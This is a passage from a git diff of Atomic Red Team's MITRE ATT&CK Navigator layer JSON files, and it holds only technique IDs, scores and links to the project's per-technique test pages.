mics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 106fd708..6795fd26 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","